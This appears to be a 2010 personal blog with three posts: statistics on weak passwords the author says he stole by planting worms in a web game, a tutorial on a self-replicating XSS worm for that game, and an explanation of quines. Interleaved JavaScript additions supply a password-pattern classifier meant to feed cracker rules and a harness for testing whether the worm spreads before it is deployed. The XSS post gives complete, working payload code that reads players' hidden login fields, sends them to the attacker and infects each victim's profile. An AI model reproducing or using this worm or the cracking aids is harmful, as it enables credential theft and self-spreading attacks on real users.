Sunday, 26 December 2010

Password Pattern Study

I suspect people will only read this if I write in Chinese, so I'm writing in Chinese. Then again, I guess even fewer people will want to read this one.

Recently someone roped me into playing a certain web game. The game was riddled with holes; later I planted a few worms and stole a pile of passwords, a pile of weak ones.
What is a weak password? Generally a person has several passwords, each with its own use. The ones used on sites that matter, such as online banking or your main email account, should look like random gibberish (if your strong password doesn't look like that, be careful). For sites that don't matter, such as the forums that make you register before you can download an attachment, the account name and password are usually just hammered out on the keyboard; those are the weak passwords.
With this much good material in hand, of course I had to study it. The question this time is what people most often use as a weak password, and how the password relates to the account name.

Data size: 100 passwords from 91 distinct accounts; 5 accounts changed their password once and 2 changed it twice
Account and password constraints: 4-8 alphanumeric characters; the account name must not equal the password (that is how the game is written, nothing to do with me)
Data collection method: not telling.

First, looking at the passwords on their own:

Length distribution:
13% 4 characters
4% 5 characters
23% 6 characters
8% 7 characters
52% 8 characters

Conclusion: passwords are 4-8 characters, and 8 characters is the most common length. Even lengths dominate; odd lengths (5 and 7) account for only 12%.

Character class distribution:
53% digits only
10% lowercase letters only
0% uppercase letters only

The 100 passwords contain 682 characters in total (4*13+5*4+6*23+7*8+8*52):
74.3% digits (507)
25.2% lowercase letters (172)
0.4% uppercase letters (3)

Conclusion: digits are very popular; an all-digit brute force is worth trying first.

Frequency of each character (share of the 682 characters):
8.06% - 0
12.17% - 1
10.12% - 2
7.04% - 3
5.72% - 4
5.87% - 5
7.18% - 6
5.87% - 7
5.57% - 8
6.74% - 9

2.79% - a
1.17% - b
0.73% - c
0.59% - d
1.32% - e
0.73% - f
1.61% - g
1.32% - h
2.49% - i
0.15% - j
1.76% - k
1.32% - l
1.03% - m
1.03% - n
0.73% - o
0.59% - p
0.00% - q
1.17% - r
0.88% - s
0.44% - t
1.32% - u
0.15% - v
0.15% - w
0.59% - x
0.59% - y
0.59% - z

0.15% - C
0.15% - K
0.15% - O
0.00% - all other uppercase letters

Digits dominate, as expected. Digits from most to least common:
1, 2, 0, 6, 3, 9, 5, 7, 4, 8

Lowercase q never appears; I guess that is because people like to type English words.


Focus: patterns in all-digit passwords
4-character passwords:
1100, 1230, 1234, 1234, 1234, 1239, 1397, 2177, 2587, 5354, 6335
Plenty of 123_. Try pressing them on a numeric keypad.

5-character passwords:
24622, 24622
The duplicate is because that player created an alt account.

6-character passwords:
061093, 101091, 123321, 159005, 369258, 701226, 753951, 852456, 881029, 941123, 941123, 950219, 951753, 951753

Quite a few look like dates.
ddmmyy: 061093, 101091
yymmdd: 701226, 881029, 941123, 941123, 950219
Others: 123321, 159005, 369258, 753951, 852456, 951753, 951753
Again, press them on a numeric keypad: many are runs of neighbouring keys (369258 walks up two columns, 753951 and 951753 cross the diagonals).

7-character passwords:
4560852
Neighbouring keys again (456 across the middle row, then 852 down the middle column).

8-character passwords:
10260816, 10260816, 11181118, 11447788, 13191212, 17138045, 19940403, 19970422, 20001003, 20112012, 24687913, suspected 2-prefix phone number 1, suspected 2-prefix phone number 1, suspected 2-prefix phone number 2, suspected 2-prefix phone number 3, suspected 2-prefix phone number 4, suspected 2-prefix phone number 5, suspected 2-prefix phone number 6, suspected 3-prefix phone number 1, suspected 3-prefix phone number 1, suspected 6-prefix phone number 1, suspected 6-prefix phone number 2, suspected 6-prefix phone number 3, suspected 6-prefix phone number 4, suspected 9-prefix phone number 1

To protect the privacy of the participants (?), the passwords that look like phone numbers are hidden.
More suspected dates this time: mmddmmdd, yyyymmdd (yyyyddmm? I don't think so).

Looks like a lot of phone numbers. If you want to crack someone's junk password, phone numbers are the best guesses.
I'll say more if anyone is interested.
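The measurements above, as an added example that is not part of the original post: the length and character-class tallies, the per-character frequency, and a classifier for the all-digit patterns the post points out (date layouts, keypad walks, phone-like numbers). SAMPLE is constructed: its digit-only entries are taken from the post's lists, the alphabetic ones are made up to exercise the class counts. The "phone-like" rule (8 digits starting with 2, 3, 5, 6 or 9, the Hong Kong numbering the post's prefixes suggest) and the two-thirds threshold for a keypad walk are my heuristics, not the post's.

```javascript
// Added example (not part of the original post): the post's tallies and pattern checks as code.
// SAMPLE is constructed; the digit-only entries come from the post's lists, the rest are made up.
const SAMPLE = ['1234', '1397', '24622', '061093', '941123', '369258', '4560852',
  '19940403', '11181118', '24687913', 'abcd', 'kevin88', 'Ken1234'];

// Length distribution: { length: count }.
function lengthDistribution(pws) {
  const dist = {};
  for (const pw of pws) dist[pw.length] = (dist[pw.length] || 0) + 1;
  return dist;
}

// Character-class totals, per password (digits-only etc.) and per character.
function charClassStats(pws) {
  const s = { passwords: pws.length, chars: 0, digit: 0, lower: 0, upper: 0,
              digitsOnly: 0, lowerOnly: 0, upperOnly: 0 };
  for (const pw of pws) {
    if (/^[0-9]+$/.test(pw)) s.digitsOnly++;
    else if (/^[a-z]+$/.test(pw)) s.lowerOnly++;
    else if (/^[A-Z]+$/.test(pw)) s.upperOnly++;
    for (const c of pw) {
      s.chars++;
      if (/[0-9]/.test(c)) s.digit++;
      else if (/[a-z]/.test(c)) s.lower++;
      else if (/[A-Z]/.test(c)) s.upper++;
    }
  }
  return s;
}

// Per-character frequency as [char, count] pairs, most common first (ties by character code).
function charFrequency(pws) {
  const counts = new Map();
  for (const pw of pws) for (const c of pw) counts.set(c, (counts.get(c) || 0) + 1);
  return [...counts].sort((a, b) => b[1] - a[1] || (a[0] < b[0] ? -1 : 1));
}

// Numeric keypad layout as (row, column); the wide 0 key sits under 1 and 2.
const NUMPAD = { 7: [0, 0], 8: [0, 1], 9: [0, 2], 4: [1, 0], 5: [1, 1], 6: [1, 2],
                 1: [2, 0], 2: [2, 1], 3: [2, 2], 0: [3, 0.5] };

// Number of consecutive digit pairs that are the same key or neighbouring keys on the keypad.
function numpadAdjacentPairs(pw) {
  let adj = 0;
  for (let k = 1; k < pw.length; k++) {
    const [r1, c1] = NUMPAD[pw[k - 1]], [r2, c2] = NUMPAD[pw[k]];
    if (Math.max(Math.abs(r1 - r2), Math.abs(c1 - c2)) <= 1) adj++;
  }
  return adj;
}

// Every step is +1 or every step is -1 (1234, 4321).
function isStraightRun(pw) {
  const step = pw.charCodeAt(1) - pw.charCodeAt(0);
  if (Math.abs(step) !== 1) return false;
  for (let k = 1; k < pw.length; k++) {
    if (pw.charCodeAt(k) - pw.charCodeAt(k - 1) !== step) return false;
  }
  return true;
}

function plausibleDate(dd, mm) { return mm >= 1 && mm <= 12 && dd >= 1 && dd <= 31; }

// Tags for an all-digit password. Date layouts are checked first, as the post does;
// keypad patterns only when nothing else fits. Returns [] when no pattern matches.
function classifyDigits(pw) {
  if (!/^[0-9]+$/.test(pw)) return ['not all digits'];
  const n = pw.length, tags = [];
  const f = (a, b) => Number(pw.slice(a, b));
  if (n % 2 === 0 && pw.slice(0, n / 2) === pw.slice(n / 2)) tags.push('repeated half');
  if (n === 6) {
    if (plausibleDate(f(0, 2), f(2, 4))) tags.push('date ddmmyy');
    if (plausibleDate(f(4, 6), f(2, 4))) tags.push('date yymmdd');
  }
  if (n === 8) {
    if (f(0, 4) >= 1900 && f(0, 4) <= 2010 && plausibleDate(f(6, 8), f(4, 6))) tags.push('date yyyymmdd');
    if (plausibleDate(f(2, 4), f(0, 2)) && plausibleDate(f(6, 8), f(4, 6))) tags.push('date mmddmmdd');
    // Assumption: local (Hong Kong) phone numbers are 8 digits starting with 2, 3, 5, 6 or 9.
    if (tags.length === 0 && /^[23569]/.test(pw)) tags.push('phone-like');
  }
  if (tags.length === 0 && n >= 4) {
    if (isStraightRun(pw)) tags.push('straight run');
    else if (numpadAdjacentPairs(pw) * 3 >= (n - 1) * 2) tags.push('numpad walk'); // >= 2/3 of steps
  }
  return tags;
}
```

Run it over a real dump by replacing SAMPLE; the tag list per password is what you would feed into mask or rule generation for a cracker (all-digit first, then dates, then keypad runs), which is the ordering the post's numbers argue for.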

Tuesday, 21 December 2010

Script Kiddie Class: Quine in XSS

Last time I demonstrated how to write a quine, a program that outputs its own source code. This time I will show how malicious JavaScript can reproduce itself and infect other users.

In web applications, one vulnerability that directly threatens users is Cross-site Scripting (XSS), which lets an attacker inject client-side script into a page that other users load. The following example is based on a real web game (with some modifications):

Scenario (skip it if you don't like reading bullshxt)
Xyzzy Agora is a multi-player web-based game. Players create their own character to join the virtual adventure. Like other web-based role-playing games, players choose their ID, password, nickname, color, avatar, battle slogan and website link during registration; all of these except the ID and nickname can be changed afterwards. Players can also allocate additional stat points to their default abilities (5 points each) based on a random number.

After registering or logging in, players are redirected to a main street page. From there they can start an adventure, buy weapons or equipment, train their abilities, train their pets, ask NPCs for adventure information, battle other players, change their information, send gifts to other players, send private messages to other players, or go to the chat room. Each action is a button, and each button is the submit button of its own form, which carries the user ID, password and action ID as hidden fields. At the top of every page the currently online users are shown in a row, each linked to the corresponding profile page.

The nickname of a character is displayed as follows:
<font color=**COLOR**>**NICKNAME**</font>
where **COLOR** is the color the player selected from a drop-down list during registration or profile update, and **NICKNAME** is the nickname picked during registration. The colored nickname is displayed on every page. Other players' colored nicknames are displayed on the player's profile page, the private message page, and in the chat room.

Vulnerabilities
1) The color attribute of a player's profile is neither validated nor encoded on output (the drop-down list is only a browser-side convenience). Anyone can inject client-side script into every page that displays that player's nickname.
2) The user ID and password are stored in hidden fields on every page after login. With XSS, a script can read them straight out of the DOM.
3) The color attribute can be updated from the profile page. Using a quine as the XSS payload, other players can be infected, and the player who originally posted the code can remove it once someone else has been infected. Without proper activity logs this is hard to trace.
4) A private message is shown only to the receiver; the sender keeps no record of what was sent. For simplicity, the stolen user ID and password are sent to the attacker by private message instead of to an external site (though the game administrator could easily spot this).
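The nickname rendering described in vulnerability 1, vulnerable form beside a hardened form, as an added example (not the game's code). The colour list, the helper names and the idea that profile.php checks the value on the server are assumptions; the post only says the game offered a drop-down in the browser, which is exactly why the attack in the next section works.

```javascript
// Added example (not the game's code): the <font color=...>NICKNAME</font> rendering
// from the post, vulnerable and hardened. Colour list and helper names are assumptions.
const ALLOWED_COLORS = new Set(['black', 'red', 'green', 'blue', 'orange', 'purple']);

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable: unquoted attribute, profile fields inserted verbatim.
function renderNicknameVulnerable(color, nickname) {
  return '<font color=' + color + '>' + nickname + '</font>';
}

// Hardened: the enumerated field is checked against an allowlist (not merely offered in a
// drop-down), the attribute is quoted, and free text is HTML-escaped.
function renderNicknameHardened(color, nickname) {
  const safeColor = ALLOWED_COLORS.has(color) ? color : 'black';
  return '<font color="' + safeColor + '">' + escapeHtml(nickname) + '</font>';
}

// The same allowlist applied when profile.php receives an update, so a bad value is
// rejected before it is stored and replayed to every other player.
function acceptProfileColor(color) {
  return ALLOWED_COLORS.has(color);
}

// The probe from step 1 of the attack below: closes the attribute, opens a script tag.
const PROBE = "0><script>alert('XSS')</script";
```

Validating at write time and encoding at render time are both needed: the first keeps the database clean, the second protects pages that render values written before the check existed or by other code paths.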

Steps of Attack
1. Test for the XSS vulnerability by changing the color attribute on the profile update page (profile.php) to:
0><script>alert('XSS')</script
The nickname is then rendered as follows (the > that closed the original font tag now closes the injected script tag):
<font color=0><script>alert('XSS')</script>**NICKNAME**</font>

2. Identify the target pages:
Among the pages that can carry the XSS, the chat room has the highest traffic, so the script must run correctly in the chat room (chat.php). Also working on the player profile page and the private message page would be a plus. Keep in mind that a player's own colored name is shown on every page, so avoid triggering the payload too many times, since private messages are rate-limited.

3. Write a password stealer
This example uses AJAX, since the destination (pm.php) is on the same origin.
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
Explanation:
First line: returns the XMLHttpRequest object (copied from jQuery and shortened).
Second line: stores the victim's user ID and password, given that the first form on every page holds the user ID in a "uid" field and the password in a "pass" field. encodeURIComponent prevents the request from breaking on special characters in the password.
Third line: the URL the victim's browser will request, which sends the user ID and password to "someone" as a private message.
Fourth line: sends the GET request via AJAX.

4. Write a code injector
Apart from stealing the password, we also want to change the victim's color attribute and so spread the XSS worm. The XMLHttpRequest helper and the stored user ID and password are reused in the following script:
v='profile.php?uid='+i+'&pass='+p+'&color=*XSS CODE HERE*';
b=x();b.open('GET',v);b.send()
Now the problem is how to put the entire program, XSS wrapper included, back into the color parameter. This is where the concept of a quine becomes useful. A JavaScript quine is easier than in other languages, because a function can refer to itself and converting it to a string yields its source:
function $(){_=$+'$()'}$()
(I intentionally used unusual characters for the function and variable names.)
This code runs the $ function and stores the entire program in the variable _. You can put other code before or after, like this:
function $(){document.write($+'$()');_=$+'$()';alert(_)}$()
The entire program is still stored in _.
Now we can put everything together. Before that, I added shortcut variables for two special characters:
l=String.fromCharCode(60);g=String.fromCharCode(62);
Steps 1, 3 and 4 combined (as one single line):
0><script>
function $(){_=$+'$()';l=String.fromCharCode(60);g=String.fromCharCode(62);
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
v='profile.php?uid='+i+'&pass='+p+'&color=0'+encodeURIComponent(g+l+'script'+g+_+l+'/script'); b=x();b.open('GET',v);b.send()}$()
</script
Setting this as your color attribute launches the first wave of the XSS worm.
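The worm above run against a fake page, as an added example that is not part of the original post. It checks the property that makes the worm spread: the color value the victim's browser submits to profile.php is byte-for-byte the value that infected it, so the second generation is identical to the first. document, XMLHttpRequest, the victim's credentials and the helpers colorPayload, infect and propagates are constructed stand-ins; the ActiveX fallback is dropped and the password is URL-encoded as in step 3. Modern engines return a function's exact source text from its string conversion, so the comparison holds exactly here; the Remark below about extra line breaks applies to older engines.

```javascript
// Added example (not part of the original post): the worm from steps 1+3+4 run in a
// fake page, checking that the colour value it submits reproduces itself exactly.
const WORM = [
  "function $(){_=$+'$()';",
  "l=String.fromCharCode(60);g=String.fromCharCode(62);",
  "function x(){return new XMLHttpRequest}",
  "d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);",
  "u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;",
  "a=x();a.open('GET',u);a.send();",
  "v='profile.php?uid='+i+'&pass='+p+'&color=0'+encodeURIComponent(g+l+'script'+g+_+l+'/script');",
  "b=x();b.open('GET',v);b.send()}$()",
].join('');

// What the attacker types into the colour field: close the attribute, open a script tag.
function colorPayload(scriptBody) {
  return '0><script>' + scriptBody + '</script';
}

// Constructed page: the first form carries the hidden uid/pass fields, as in the game.
globalThis.document = { forms: [{ uid: { value: 'victim' }, pass: { value: 'p@ss w0rd' } }] };

// Constructed XMLHttpRequest that records requests instead of sending them.
const sent = [];
globalThis.XMLHttpRequest = class {
  open(method, url) { this.method = method; this.url = url; }
  send() { sent.push({ method: this.method, url: this.url }); }
};

// One victim loading an infected page: evaluate the script body the way an inline
// <script> would (indirect eval = global, non-strict scope) and return what it sent.
function infect(scriptBody) {
  sent.length = 0;
  (0, eval)(scriptBody);
  const query = url => new URLSearchParams(url.slice(url.indexOf('?') + 1));
  const pm = sent.find(r => r.url.startsWith('pm.php?'));
  const profile = sent.find(r => r.url.startsWith('profile.php?'));
  return { leaked: query(pm.url).get('message'), newColor: query(profile.url).get('color') };
}

// Fixed-point check: the body the next victim receives equals the body that just ran,
// and running that next body produces the same colour value again.
function propagates(scriptBody) {
  const next = infect(scriptBody).newColor;
  if (next !== colorPayload(scriptBody)) return false;
  const nextBody = next.slice('0><script>'.length, -'</script'.length);
  return infect(nextBody).newColor === next;
}
```

The same harness is a cheap way to vet a payload before deploying it: if toString, URL encoding or the form field names differ from what the worm assumes, propagates returns false instead of the worm dying silently after the first victim.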

Remark

Converting a function to a string may add line breaks and tabs in some browsers. I have another version that uses eval and unescape, which makes the quoting easier:
v='q=String.fromCharCode(39);w=%27v=%27+q+v+q+%27;eval(unescape(v))%27;alert(w);';eval(unescape(v))
Replace alert(w) with your code.
Another remark: consider that the program may run several times on one page. You can hook the body onload event so the XSS code runs once even if it appears in the same page many times. You may also need to add conditions so the code does not run on pages where you do not want it.

If you are interested in this scenario or example, you may ask me for a prototype demo. (Well, I think no one will read this bullshxt :D)

Monday, 20 December 2010

Script Kiddie Class: Quine

How can a program output its own source code at runtime? It is harder than it looks. Let's see an example in VB:

Debug.Print("Code")
The output is Code, but I want the output to be Debug.Print("Code").

Debug.Print("Debug.Print(""Code"")")
Now the output is Debug.Print("Code"), but the program code has changed too, and now I want Debug.Print("Debug.Print(""Code"")").


Printing directly gets you nowhere, because every change to the output changes the program. To write a quine, store the program's source in a string and produce the output from that string.

Example:

Function Q(x) As String
 t = Split(x, vbCrLf)
 For i = 0 To UBound(t) - 1
 Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & " & vbCrLf & _" & vbCrLf & vbTab & vbTab
 Next
 Q = Q & Chr(34) & t(i) & Chr(34)
End Function

Sub Form_Load()
 V = "Function Q(x) As String" & vbCrLf & _
		" t = Split(x, vbCrLf)" & vbCrLf & _
		" For i = 0 To UBound(t) - 1" & vbCrLf & _
		" Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & "" & vbCrLf & _"" & vbCrLf & vbTab & vbTab" & vbCrLf & _
		" Next" & vbCrLf & _
		" Q = Q & Chr(34) & t(i) & Chr(34)" & vbCrLf & _
		"End Function" & vbCrLf & _
		"" & vbCrLf & _
		"Sub Form_Load()" & vbCrLf & _
		" V = ?" & vbCrLf & _
		" Debug.Print Replace(V, Chr(63), Q(V))" & vbCrLf & _
		"End Sub"
 Debug.Print Replace(V, Chr(63), Q(V))
End Sub
The entire program is stored in V. The function Q escapes that string into VB source form: it doubles every quote and turns each line into a quoted literal joined by & vbCrLf & _ continuations, each continuation line indented by two tabs. The question mark (Chr 63) marks where the escaped program text is substituted back into V, so the output is the program with its own source spliced into the V assignment. The whitespace has to match exactly for the output to equal the source: lines inside the two procedures start with a single space and the continuation lines start with two tabs, because that is what Q emits.
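The same construction in JavaScript, as an added example that is not part of the original post, so the result can be checked mechanically: the program text lives in V with a ? placeholder, an escaper turns V into a string literal that evaluates back to V, and the output is V with the placeholder replaced by that literal. JSON.stringify plays the role of the VB function Q (where Q doubles quotes and splits lines into concatenated literals, JSON.stringify escapes quotes, backslashes and line breaks into one valid JavaScript literal). print is an output sink I supply in place of Debug.Print; buildQuine, runProgram and isQuine are my helper names.

```javascript
// Added example (not part of the original post): the VB program's escape-and-substitute
// construction in JavaScript, with a check that the output really equals the source.
const TAIL = "print(V.replace('?',JSON.stringify(V)));";

// Build a quine from any code that ends by printing V with the placeholder filled in.
// The result is the text 'V=<literal of V>;\n<tail>', i.e. V with '?' replaced by its own literal.
function buildQuine(tail) {
  const V = 'V=?;\n' + tail;                      // the whole program, placeholder included
  return 'V=' + JSON.stringify(V) + ';\n' + tail;  // same text with V's escaped form spliced in
}

// Run a program with print() captured (standing in for Debug.Print) and return its output.
function runProgram(source) {
  const out = [];
  globalThis.print = s => out.push(String(s));
  (0, eval)(source);                               // indirect eval: global, non-strict scope
  return out.join('\n');
}

// A program is a quine when what it prints is exactly its own source.
function isQuine(source) {
  return runProgram(source) === source;
}

const QUINE = buildQuine(TAIL);
```

Anything may be added to the tail before the final print (the VB version likewise tolerates extra statements in Form_Load), as long as the placeholder remains the first ? in V and the tail is copied verbatim both into V and after it.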



Looks funny but messy. So what is the point of all this? ... I'll tell you later.